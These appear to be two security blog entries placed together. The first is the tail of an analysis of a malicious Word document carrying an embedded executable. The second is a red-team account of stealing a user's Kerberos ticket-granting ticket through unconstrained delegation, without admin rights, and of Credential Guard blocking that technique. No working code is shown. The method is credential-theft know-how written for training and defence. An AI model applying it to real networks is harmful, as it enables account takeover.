The O indicator for stream A2 tells us that this stream is the OLE data structure embedding the executable.

Selecting this stream and using option -i gives us info about the OLE contained, and the contained file:

This metadata gives you the names of the embedded file and it hashes, allowing me to look it up directly on VirusTotal, for example: 3d5fe12c0aa783252431834ed8e370102f47df65165680824b9287faa88e088a.

The file can also be extracted with option -e:

Malicious Word documents like these don't execute the embedded file when the document is opened: that requires social engeneering to entice the use to double-click the embedded file.

 

Didier Stevens
Senior handler
blog.DidierStevens.com

The vast majority of red team exercises that I (and my team, of course) have been doing lately are assumed breach scenarios. In an assumed breach scenario (and we cover this in the amazing SEC565: Red Team Operations and Adversary Emulation SANS course that I also teach!) red team is usually given access as a non-privileged domain user, simulating an attacker that has someone already established the first foothold in the organization.

This works quite well as we know that eventually the attacker will succeed and perhaps get a victim (most of the time through some kind of social engineering) to execute their binary. So the first part in such an engagement is to create a malicious binary (an implant) that will evade security controls in the target organization. Most of red teams will have specialists for this.

The next step includes delivery of implant and execution in context of a regular, non-privileged domain user, on the workstation designated for the red team exercise. And if everything works well, we’ll get that beacon communicating to our front end servers.

What now? While there are many things we do next, such as getting some awareness about the organization, setting up persistence, trying to move laterally, there are cases when we would like to fetch the user’s password, or their TGT (Ticket Granting Ticket) for Kerberos. Some actions will not need this, as we can use the builtin Windows authentication of the process our beacon is running under, but if you want, for example, to start a SOCKS proxy and tunnel some tools from your office, we will need to authenticate to target services, and for that we will either need the user’s password, their password hash or TGT. How do we get one through our implant, considering that we do not have local administrator privileges yet?

Unconstrained delegation

Back in 2018, Benjamin Deply, the famous Mimikatz/Kekeo author published a very interesting method (https://x.com/gentilkiwi/status/998219775485661184) of obtaining a user’s TGT without requiring administrator privileges.

The trick is the following: as our implant is running under a regular user, that is already authenticated, we will abuse Kerberos GSS-API to ask for a ticket for a service, but not any service – a service that has been configured for unconstrained delegation!

The idea is the following – as we will be requesting a service ticket for a service that is configured for unconstrained delegation, the resulting response that we will receive from a domain controller will also include our own TGT. In a normal workflow, this response is converted to an application request (AP-REQ) that is sent to the target service.

AP-REQ is made up of two components: a ticket and an authenticator. We are interested in the authenticator – it is encrypted with the ticket session key which is known to us, and to the target service that we want to access. And this is were Benjamin’s great research comes into place – if we request a service ticket for a service that has been configured for unconstrained delegation, the authenticator component will contain our TGT (since the target service will need it)!

In other words, we can carve out the TGT of the currently logged in user, without needing administrator privileges! This functionality exists in Rubeus, but if you are running your Cobalt Strike implant (in SEC565 we use Cobalt Strike and Empire), it is better to use a BOF for this purpose. There are several BOF’s you can use, one I like is the tgtdelegation BOF available at https://github.com/connormcgarr/tgtdelegation

Before we start using it, one thing we did not mention is how to find a service that has been configured for unconstrained delegation. This is actually trivial as Domain Controllers are configured for unconstrained delegation by default, so we can use, for example, CIFS/domain.controller or HOST/domain.controller as target SPN’s.

The figure above shows how easy it is to fetch the TGT. You can see how the BOF displayed the AP-REQ output, extracted the session key and identified the encryption algorithm (AES256) and finally (not visible) extracted the TGT.

Credential Guard

By fetching a TGT we can now perform a number of other things, including relaying traffic through a SOCKS proxy. So in a recent engagement I tried to do this but all requests failed – every single time the response received did not contain a TGT, even though the target service indeed was configured for unconstrained delegation, and the account used was not marked as “Account is sensitive and cannot be delegated.”

In other words, we can see that the AP-REQ was indeed received, but it did not contain our TGT in the authenticator part of the response. What could cause this?

After some time and research, it turned out that the reason for this was Credential Guard, which was enabled on the client machine.

Among other (great) security features that Credential Guard brings, one thing that is important for this particular attack (or abuse) is that Credential Guard completely blocks Kerberos Unconstrained delegation, which effectively blocks us from extracting the TGT (and will break any application that relies on this feature as well!).

Besides this, Credential Guard also blocks NTLMv1 completely and there are a number of other nice security controls, as listed https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/

Test and enable!

In engagements I do I still do not see Credential Guard enabled in many enterprises. No wonder since it can break some things, however as Microsoft is now enabling Credential Guard by default in Windows 11 22H2 and Windows Server 2025, it is definitely worth checking whether your organization is ready for a wide adoption of it. It will not stop every attack, but every single step will help!

Thanks to my team members Luka, Neven, Fran and Mislav for debugging! In a RT you need a team!
 
--
Bojan
@bojanz
@bojanz.bsky.social
INFIGO IS